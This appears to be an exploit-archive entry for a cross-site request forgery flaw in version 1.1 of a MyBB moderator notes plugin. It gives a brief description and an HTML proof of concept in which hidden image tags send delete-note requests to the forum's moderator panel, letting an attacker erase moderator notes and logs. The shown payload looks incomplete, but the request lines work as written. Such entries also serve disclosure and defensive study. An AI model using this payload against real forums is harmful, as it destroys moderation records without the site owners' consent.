Exploits / Vulnerability Discovered : 2018-08-20 |
Type : webapps |
Platform : php
This exploit / vulnerability Mybb moderator log notes plugin 1.1 crosssite request forgery is for educational purposes only and if it is used you will do on your own risk!
# 1. Description:
# The plugin allows moderators to save notes and display them in a list in the modCP.
# The CSRF allows an attacker to remotely delete all mod notes and mod note logs
# in the modCP & ACP.
<!-- You can also delete notes individually by the nid (note ID)
<img style="display:none" src="http://localhost/mybb15/modcp.php?action=deletenote&nid=3" alt="">
<img style="display:none" src="http://localhost/mybb15/modcp.php?action=deletenote&nid=2" alt="">
<img style="display:none" src="http://localhost/mybb15/modcp.php?action=deletenote&nid=1" alt="">
-->
</body>
</html>
Mybb moderator log notes plugin 1.1 crosssite request forgery